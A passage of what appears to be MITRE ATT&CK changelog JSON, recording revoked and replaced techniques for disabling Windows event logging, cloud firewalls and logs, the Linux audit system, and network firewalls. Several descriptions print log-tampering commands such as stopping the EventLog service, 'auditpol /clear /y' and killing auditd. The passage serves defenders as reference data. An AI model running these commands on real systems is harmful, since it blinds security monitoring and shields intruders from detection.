                            "url": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"
                        },
                        {
                            "source_name": "Advanced_sec_audit_policy_settings",
                            "description": "Simpson, D. et al. (2017, April 19). Advanced security audit policy settings. Retrieved September 14, 2021.",
                            "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings"
                        },
                        {
                            "source_name": "auditpol.exe_STRONTIC",
                            "description": "STRONTIC. (n.d.). auditpol.exe. Retrieved September 9, 2021.",
                            "url": "https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html"
                        },
                        {
                            "source_name": "evt_log_tampering",
                            "description": "svch0st. (2020, September 30). Event Log Tampering Part 1: Disrupting the EventLog Service. Retrieved September 14, 2021.",
                            "url": "https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_contributors": [
                        "Prasanth Sadanala, Cigna Information Protection (CIP) - Threat Response Engineering Team",
                        "Lucas Heiligenstein"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.4",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-14 22:54:40.108000+00:00\", \"old_value\": \"2025-10-24 17:48:45.425000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--1411e6b8-80a6-4465-9909-54eaa9c67ce0",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-14 22:54:01.982000+00:00",
                        "modified": "2026-04-22 15:43:20.588000+00:00",
                        "name": "Disable or Modify Windows Event Log",
                        "description": "Adversaries may disable or modify the Windows Event Log to limit data that can be leveraged for detections and audits. Windows Event Log records user and system activity such as login attempts and process creation.(Citation: EventLog_Core_Technologies) This data is used by security tools and analysts to generate detections. \n\nThe EventLog service maintains event logs from various system components and applications. By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to `Security Settings\\Local Policies\\Audit Policy` for basic audit policy settings or `Security Settings\\Advanced Audit Policy Configuration` for advanced audit policy settings.(Citation: Microsoft Audit Policy)(Citation: Microsoft Adv Security Settings) `auditpol.exe` may also be used to set audit policies.(Citation: Microsoft auditpol)\n\nAdversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the `Set-Service -Name EventLog -Status Stopped` or `sc config eventlog start=disabled` commands (followed by manually stopping the service using `Stop-Service -Name EventLog`). Additionally, the service may be disabled by modifying the \"Start\" value in `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog` then restarting the system for the change to take effect.(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging)\n\nThere are several ways to disable the EventLog service via registry key modification. Without Administrator privileges, adversaries may modify the \"Start\" value in the key `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Security`, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) With Administrator privilege, adversaries may modify the same values in `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-System` and `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Application` to disable the entire EventLog.\n\nAdditionally, adversaries may use `auditpol` and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the `/success` or `/failure` parameters. For example, `auditpol /set /category:\"Account Logon\" /success:disable /failure:disable` turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC) To clear the audit policy, adversaries may run the following lines: `auditpol /clear /y` or `auditpol /remove /allusers`.(Citation: T1562.002_redcanaryco)",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-attack",
                                "phase_name": "defense-impairment"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1685/001",
                                "external_id": "T1685.001"
                            },
                            {
                                "source_name": "Disable_Win_Event_Logging",
                                "description": " dmcxblue. (n.d.). Disable Windows Event Logging. Retrieved September 10, 2021.",
                                "url": "https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging"
                            },
                            {
                                "source_name": "EventLog_Core_Technologies",
                                "description": "Core Technologies. (2021, May 24). Essential Windows Services: EventLog / Windows Event Log. Retrieved September 14, 2021.",
                                "url": "https://www.coretechnologies.com/blog/windows-services/eventlog/"
                            },
                            {
                                "source_name": "disable_win_evt_logging",
                                "description": "Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.",
                                "url": "https://ptylu.github.io/content/report/report.html?report=25"
                            },
                            {
                                "source_name": "Microsoft Audit Policy",
                                "description": "Microsoft. (n.d.). Retrieved April 15, 2026.",
                                "url": "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/audit-policy"
                            },
                            {
                                "source_name": "Microsoft Adv Security Settings",
                                "description": "Microsoft. (n.d.). Retrieved April 15, 2026.",
                                "url": "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/advanced-security-audit-policy-settings"
                            },
                            {
                                "source_name": "Microsoft auditpol",
                                "description": "Microsoft. (n.d.). Retrieved April 15, 2026.",
                                "url": "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol"
                            },
                            {
                                "source_name": "winser19_file_overwrite_bug_twitter",
                                "description": "Naceri, A. (2021, November 7). Windows Server 2019 file overwrite bug. Retrieved April 7, 2022.",
                                "url": "https://web.archive.org/web/20211107115646/https://twitter.com/klinix5/status/1457316029114327040"
                            },
                            {
                                "source_name": "T1562.002_redcanaryco",
                                "description": "redcanaryco. (2021, September 3). T1562.002 - Disable Windows Event Logging. Retrieved September 13, 2021.",
                                "url": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"
                            },
                            {
                                "source_name": "auditpol.exe_STRONTIC",
                                "description": "STRONTIC. (n.d.). auditpol.exe. Retrieved September 9, 2021.",
                                "url": "https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_contributors": [
                            "Lucas Heiligenstein",
                            "Prasanth Sadanala, Cigna Information Protection (CIP) - Threat Response Engineering Team"
                        ],
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "enterprise-attack"
                        ],
                        "x_mitre_is_subtechnique": true,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_platforms": [
                            "Windows"
                        ],
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-06-24 16:55:46.243000+00:00",
                    "modified": "2026-04-14 22:54:46.072000+00:00",
                    "name": "Disable or Modify Cloud Firewall",
                    "description": "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary with appropriate permissions may introduce new firewall rules or policies to allow access into a victim cloud environment and/or move laterally from the cloud control plane to the data plane. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups (or creates new security groups entirely) to allow any TCP/IP connectivity to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022) They may also remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1562/007",
                            "external_id": "T1562.007"
                        },
                        {
                            "source_name": "Expel IO Evil in AWS",
                            "description": "A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.",
                            "url": "https://expel.io/blog/finding-evil-in-aws/"
                        },
                        {
                            "source_name": "Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022",
                            "description": "Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials: Case Studies From the Wild. Retrieved March 9, 2023.",
                            "url": "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_contributors": [
                        "Expel",
                        "Arun Seelagan, CISA"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS"
                    ],
                    "x_mitre_version": "1.3",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-14 22:54:46.072000+00:00\", \"old_value\": \"2025-10-24 17:48:58.515000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--ee474564-64be-4b83-a958-53f238f49b01",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-14 22:54:04.618000+00:00",
                        "modified": "2026-04-22 15:38:27.348000+00:00",
                        "name": "Cloud Firewall",
                        "description": "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources.\n\nCloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary with appropriate permissions may introduce new firewall rules or policies to allow access into a victim cloud environment and/or move laterally from the cloud control plane to the data plane.\n\nFor example, an adversary may use a script or utility that creates new ingress rules in existing security groups (or creates new security groups entirely) to allow any TCP/IP connectivity to a cloud-hosted instance. They may also remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Expel AWS)",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-attack",
                                "phase_name": "defense-impairment"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1686/001",
                                "external_id": "T1686.001"
                            },
                            {
                                "source_name": "Expel AWS",
                                "description": "Anthony Randazzo, Britton Manahan, Sam Lipton. (2020, April 28). Managed Detection & Response for AWS. Retrieved April 15, 2026.",
                                "url": "https://expel.com/blog/finding-evil-in-aws/"
                            },
                            {
                                "source_name": "Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022",
                                "description": "Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials: Case Studies From the Wild. Retrieved March 9, 2023.",
                                "url": "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_contributors": [
                            "Arun Seelagan, CISA",
                            "Expel"
                        ],
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "enterprise-attack"
                        ],
                        "x_mitre_is_subtechnique": true,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_platforms": [
                            "IaaS"
                        ],
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--cacc40da-4c9e-462c-80d5-fd70a178b12d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-10-12 13:52:32.846000+00:00",
                    "modified": "2026-04-14 22:54:41.829000+00:00",
                    "name": "Disable or Modify Cloud Logs",
                    "description": "An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.\n\nFor example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) They may alternatively tamper with logging functionality \u2013 for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Update Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the `Set-MailboxAuditBypassAssociation` cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user\u2019s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1562/008",
                            "external_id": "T1562.008"
                        },
                        {
                            "source_name": "Stopping CloudTrail from Sending Events to CloudWatch Logs",
                            "description": "Amazon Web Services. (n.d.). Stopping CloudTrail from Sending Events to CloudWatch Logs. Retrieved October 16, 2020.",
                            "url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html"
                        },
                        {
                            "source_name": "AWS Update Trail",
                            "description": "AWS. (n.d.). update-trail. Retrieved August 4, 2023.",
                            "url": "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/update-trail.html"
                        },
                        {
                            "source_name": "Following the CloudTrail: Generating strong AWS security signals with Sumo Logic",
                            "description": "Dan Whalen. (2019, September 10). Following the CloudTrail: Generating strong AWS security signals with Sumo Logic. Retrieved October 16, 2020.",
                            "url": "https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/"
                        },
                        {
                            "source_name": "Configuring Data Access audit logs",
                            "description": "Google. (n.d.). Configuring Data Access audit logs. Retrieved October 16, 2020.",
                            "url": "https://cloud.google.com/logging/docs/audit/configure-data-access"
                        },
                        {
                            "source_name": "Dark Reading Microsoft 365 Attacks 2021",
                            "description": "Kelly Sheridan. (2021, August 5). Incident Responders Explore Microsoft 365 Attacks in the Wild. Retrieved March 17, 2023.",
                            "url": "https://www.darkreading.com/threat-intelligence/incident-responders-explore-microsoft-365-attacks-in-the-wild/d/d-id/1341591"
                        },
                        {
                            "source_name": "az monitor diagnostic-settings",
                            "description": "Microsoft. (n.d.). az monitor diagnostic-settings. Retrieved October 16, 2020.",
                            "url": "https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_delete"
                        },
                        {
                            "source_name": "Pacu Detection Disruption Module",
                            "description": "Rhino Security Labs. (2021, April 29). Pacu Detection Disruption Module. Retrieved August 4, 2023.",
                            "url": "https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_contributors": [
                        "Syed Ummar Farooqh, McAfee",
                        "Prasad Somasamudram, McAfee",
                        "Sekhar Sarukkai, McAfee",
                        "Ibrahim Ali Khan",
                        "Alex Soler, AttackIQ",
                        "Janantha Marasinghe",
                        "Matt Snyder, VMware",
                        "Joe Gumke, U.S. Bank",
                        "Arun Seelagan, CISA"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS",
                        "SaaS",
                        "Office Suite",
                        "Identity Provider"
                    ],
                    "x_mitre_version": "2.1",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-14 22:54:41.829000+00:00\", \"old_value\": \"2025-10-24 17:49:23.308000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--34ff60a3-a3f8-42e4-bed0-af9a2cb563d7",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-14 22:54:02.368000+00:00",
                        "modified": "2026-04-22 15:42:27.748000+00:00",
                        "name": "Disable or Modify Cloud Log",
                        "description": "An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities. \n\nFor example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity. They may alternatively tamper with logging functionality, for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Cloud Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the Set-MailboxAuditBypassAssociation cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user\u2019s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading)",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-attack",
                                "phase_name": "defense-impairment"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1685/002",
                                "external_id": "T1685.002"
                            },
                            {
                                "source_name": "AWS Cloud Trail",
                                "description": "AWS. (n.d.). update-trail. Retrieved April 15, 2026.",
                                "url": "https://docs.aws.amazon.com/cli/latest/reference/cloudtrail/update-trail.html"
                            },
                            {
                                "source_name": "Dark Reading",
                                "description": "Kelly Sheridan. (2021, August 5). Retrieved April 15, 2026.",
                                "url": "https://www.darkreading.com/threat-intelligence/incident-responders-explore-microsoft-365-attacks-in-the-wild"
                            },
                            {
                                "source_name": "Pacu Detection Disruption Module",
                                "description": "Rhino Security Labs. (2021, April 29). Pacu Detection Disruption Module. Retrieved August 4, 2023.",
                                "url": "https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_contributors": [
                            "Alex Soler, AttackIQ",
                            "Arun Seelagan, CISA",
                            "Ibrahim Ali Khan",
                            "Janantha Marasinghe",
                            "Joe Gumke, U.S. Bank",
                            "Matt Snyder, VMware",
                            "Prasad Somasamudram, McAfee",
                            "Sekhar Sarukkai, McAfee",
                            "Syed Ummar Farooqh, McAfee"
                        ],
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "enterprise-attack"
                        ],
                        "x_mitre_is_subtechnique": true,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_platforms": [
                            "IaaS",
                            "SaaS",
                            "Identity Provider",
                            "Office Suite"
                        ],
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--562e9b64-7239-493d-80f4-2bff900d9054",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-05-24 19:03:03.855000+00:00",
                    "modified": "2026-04-14 22:54:44.666000+00:00",
                    "name": "Disable or Modify Linux Audit System",
                    "description": "Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules.\n\nOften referred to as `auditd`, this is the name of the daemon used to write events to disk and is governed by the parameters set in the `audit.conf` configuration file. Two primary ways to configure the log generation rules are through the command line `auditctl` utility and the file `/etc/audit/audit.rules`,  containing a sequence of `auditctl` commands loaded at boot time.(Citation: Red Hat System Auditing)(Citation: IzyKnows auditd threat detection 2022)\n\nWith root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with `auditd` daemon or use `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files to ignore malicious activity.(Citation: Trustwave Honeypot SkidMap 2023)(Citation: ESET Ebury Feb 2014)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1562/012",
                            "external_id": "T1562.012"
                        },
                        {
                            "source_name": "IzyKnows auditd threat detection 2022",
                            "description": "IzySec. (2022, January 26). Linux auditd for Threat Detection. Retrieved September 29, 2023.",
                            "url": "https://izyknows.medium.com/linux-auditd-for-threat-detection-d06c8b941505"
                        },
                        {
                            "source_name": "Red Hat System Auditing",
                            "description": "Jahoda, M. et al.. (2017, March 14). Red Hat  Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.",
                            "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing"
                        },
                        {
                            "source_name": "ESET Ebury Feb 2014",
                            "description": "M.L\u00e9veill\u00e9, M.. (2014, February 21). An In-depth Analysis of Linux/Ebury. Retrieved April 19, 2019.",
                            "url": "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/"
                        },
                        {
                            "source_name": "Trustwave Honeypot SkidMap 2023",
                            "description": "Radoslaw Zdonczyk. (2023, July 30). Honeypot Recon: New Variant of SkidMap Targeting Redis. Retrieved September 29, 2023.",
                            "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-new-variant-of-skidmap-targeting-redis/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.2.0",
                    "x_mitre_contributors": [
                        "Tim (Wadhwa-)Brown"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux"
                    ],
                    "x_mitre_version": "1.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-14 22:54:44.666000+00:00\", \"old_value\": \"2025-04-15 22:20:10.121000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['revoked']\": {\"new_value\": true, \"old_value\": false}}}",
                    "revoked_by": {
                        "type": "attack-pattern",
                        "id": "attack-pattern--23d69d00-80c4-42ff-9dac-dbd0459dad75",
                        "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "created": "2026-04-14 22:54:03.325000+00:00",
                        "modified": "2026-04-22 15:42:49.357000+00:00",
                        "name": "Disable or Modify Linux Audit System Log",
                        "description": "Adversaries may disable or modify the Linux Audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules. \n\nOften referred to as `auditd`, this is the name of the daemon used to write events to disk and is governed by the parameters set in the `audit.conf` configuration file. Two primary ways to configure the log generation rules are through the command line `auditctl` utility and the file `/etc/audit/audit.rules`, containing a sequence of `auditctl` commands loaded at boot time.(Citation: IzyKnows auditd threat detection 2022)(Citation: Red Hat Linux Disable or Mod)\n\nWith root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with `auditd` daemon or use `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files to ignore malicious activity.(Citation: ESET Ebury Feb 2014)",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-attack",
                                "phase_name": "defense-impairment"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1685/004",
                                "external_id": "T1685.004"
                            },
                            {
                                "source_name": "IzyKnows auditd threat detection 2022",
                                "description": "IzySec. (2022, January 26). Linux auditd for Threat Detection. Retrieved September 29, 2023.",
                                "url": "https://izyknows.medium.com/linux-auditd-for-threat-detection-d06c8b941505"
                            },
                            {
                                "source_name": "ESET Ebury Feb 2014",
                                "description": "M.L\u00e9veill\u00e9, M.. (2014, February 21). An In-depth Analysis of Linux/Ebury. Retrieved April 19, 2019.",
                                "url": "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/"
                            },
                            {
                                "source_name": "Red Hat Linux Disable or Mod",
                                "description": "Red Hat. (n.d.). Retrieved April 15, 2026.",
                                "url": "https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_contributors": [
                            "Tim (Wadhwa-)Brown"
                        ],
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "enterprise-attack"
                        ],
                        "x_mitre_is_subtechnique": true,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_platforms": [
                            "Linux"
                        ],
                        "x_mitre_version": "1.0"
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--a0f84e1d-d25c-4dd1-bb26-3c0e68471530",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-09-22 18:31:06.483000+00:00",
                    "modified": "2026-04-14 22:54:47.142000+00:00",
                    "name": "Disable or Modify Network Device Firewall",
                    "description": "Adversaries may disable network device-based firewall mechanisms entirely or add, delete, or modify particular rules in order to bypass controls limiting network usage. \n \nModifying or disabling a network firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add new network firewall rules to allow access to all internal network subnets without restrictions.(Citation: Exposed Fortinet Fortigate firewall interface leads to LockBit Ransomware)\n\nAdversaries may gain access to the firewall management console via [Valid Accounts](https://attack.mitre.org/techniques/T1078) or by exploiting a vulnerability. In some cases, threat actors may target firewalls that have been exposed to the internet [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190).(Citation: CVE-2024-55591 Detail)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": true,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1562/013",
                            "external_id": "T1562.013"
                        },
                        {
                            "source_name": "Exposed Fortinet Fortigate firewall interface leads to LockBit Ransomware",
